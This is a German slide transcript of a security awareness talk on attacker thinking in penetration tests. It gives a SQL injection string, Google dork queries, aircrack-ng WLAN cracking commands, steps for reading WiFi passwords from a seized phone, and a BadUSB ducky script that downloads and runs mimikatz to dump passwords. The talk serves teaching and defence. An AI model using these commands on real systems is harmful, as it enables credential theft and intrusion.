Denken wie ein Hacker. Internet Security Days Peter Feil

Transkript

1 Denken wie ein Hacker Internet Security Days Peter Feil

2 Themen Keiner der Punkte stammt aus dem Labor, sondern sind Teile von Pentests. Gedanken vor der Untersuchung Von Außen nach Innen 1. Weltweiter Zugriff 1. a) Angriff über schlecht gesicherte Server 2. b) Skalpell 3. Malware Constructionkits 4. Google Hacks 2. Firmennaher Zugriff 1. WLAN 2. Mitarbeiterhandy 3. Interner Zugriff 1. BadUSB, Mimikatz und Co. 2. Physikalische Zugänge 3. Umgehung der Firewall Alle Methoden sind seit Jahren bekannt und es wird nur wenig dagegen gemacht.

3 Gedanken vor der Untersuchung 1. Verzichte auf Einteilungen wie Scriptkiddie etc. das ist unsinnig Ohhh Daten sind gestohlen und der Server ist down? Egal, war doch nur ein Scriptkiddie 2. Überlege, welche Werte die Firma für DICH bereit halten könnte und versetze dich in das Gedankengut eines Angreifers. 3. Löse dich von Begriffen wie Pentest etc. Statt dessen: Plane einen Einbruch. 4. Löse dich von Produkten. Überlege erst, was Du angreifen willst und dann mache dir über das wie Gedanken. 5. Nutze die einfachste Möglichkeit (offene Türen, Zutritt über die Raucherecke etc.). Der Angreifer tuts auch. 6. Aber: Sei gründlich und ruhe dich nicht auf dem ersten Treffer aus. 7. Nutze alle Möglichkeiten die für DICH legal sind. Ein Angreifer pfeift auch auf firmeninterne Gegebenheiten. Bitte jetzt nicht angreifen, die Admins sind im Urlaub / krank. Oder: Wir müssen wissen, wann der Test statt findet, damit wir Sicherheitskopien anlegen können. 8. Halte den Kreis der Eingeweihten gering 9. Tue Gutes und rede darüber

4 1.1. Angriff über schlecht gesicherte Server mittels Scanner (Holzhammer) Der Angriff erfolgt automatisch über einen Scanner, die es kostenlos im Internet gibt: o Nessus o Openvas o Metasploit framework (Exploit Kit) o Burp o IKE-Scan o Arachni o

5 1.2. Angriff über schlecht gesicherte Server (Skalpell) Manipulation von Parametern per SQL Injection ' or '1' = '1

6 1.3.Malware Constructionkits (Beispiel: Crimepack etc.) Crimepack Nur ein Trottel probiert mit beiden Beinen, wie tief das Wasser ist. Afrikanisches Sprichwort

7 1.4 Google Hacks o inurl:main.php phpmyadmin o inurl:perl/printenv o Index of / chat/logs o intitle: statistics of advanced web statistics o not for distribution confidential o fcgi-bin/echo o inurl:admin.php o filetype:pst inurl:"outlook.pst"

8 2.1.WLAN 1. Daten sammeln airodump-ng c xx w test wlanx 2. Alle Clients vom Router trennen aireplay-ng -0 0 e NamedesWLANS wlanx 3. Passwort knacken aircrack-ng *.cap w /listen/top150.txt Oder ein Dauer DOS Angriff per Raspberry PI Besser ein schlechtes Passwort als gar keine Lücke! Aus dem Tagebuch eines Hackers

9 2.2.a Mitarbeiterhandy BYOD = B.Y.O.Network Toolgesteuerter Angriff Einfache Durchführung Multiple Angriffsmöglichkeiten Geringes Erkennungspotential Passwort lange Zeit gültig Geringer apparativer Aufwand

10 2.2.b Mitarbeiterhandy Rootexplorer starten - bsp. ES File Explorer mit aktivierten Root Funktionen Navigieren ins Verzeichnis /data/misc/wifi Die Datei wpa_supplicant.conf bzw. bei einigen ROMs auch bcm_supp.conf mit einem Texteditor öffnen (ES File Explorer hat einen integriert) Unverschlüsseltes Passwort sowie WLAN-Zugänge auslesen und nutzen Das Device dem Besitzer zurück geben Action

11 3.1.a BadUSB, Mimikatz und Co. 1. Simuliert ein Keyboard 2. BadUSB, benötigt Java, Visual Studio und SDCC SDCC - Visual Studio - Tools - RubberDucky Chip: Phison 2303 ( ). Programm zum Testen: Flash Drive Information Extractor Patriot 8GB Supersonic Xpress* Kingston DataTraveler 3.0 T111 8GB Silicon power marvel M60 64GB Patriot Stellar 64 Gb Phison Toshiba TransMemory-MX USB GB (May ship with 2307) Toshiba TransMemory-MX USB 3.0 8GB (May ship with 2307) Kingston DataTraveler G4 64 GB Patriot PSF16GXPUSB Supersonic Xpress 16GB Silicon Power 32GB Blaze B30 (SP032GBUF3B30V1K) Verbatim STORE N GO 32GB USB Der manipulierte USB-Stick kann nach Verbinden mit dem Rechner weiteren schadhaften Code aus dem Internet nachladen um das System zu übernehmen

12 3.1.b BadUSB, Mimikatz und Co. Mimikatz Script: Auslesen der Passwörter REM mimikatz ducky script to dump local wdigest passwords from memory using mimikatz (local user needs to be an administrator/have admin privs) DELAY 3000 CONTROL ESCAPE STRING cmd CTRL-SHIFT ENTER ALT y ENTER STRING powershell (new-object System.Net.WebClient).DownloadFile(' me with webserver ip/host>/mimikatz.exe','%temp%\mimikatz.exe') ENTER STRING %TEMP%\mimikatz.exe ENTER STRING privilege::debug ENTER STRING sekurlsa::logonpasswords full ENTER STRING exit ENTER STRING del %TEMP%\mimikatz.exe ENTER Weitere Skripte Test Weitere Bearbeitung der Hashes mit John the Ripper oder Cain und Abel

13 3.3.a Umgehung der Firewall Wenn es schnell gehen muss: ü Nexus 6 ü OTG Adapter ü Fast Ethernet USB To LAN Adapter ü Software SSH Server kostenlos! Root wird nicht benötigt Kostenpunkt: ca. 475,00 EURO

14 3.3.b Umgehung der Firewall mit dem Nexus 6 +

15 Zeit für Ihre Fragen Cloud Computing und europäischer Datenschutz 15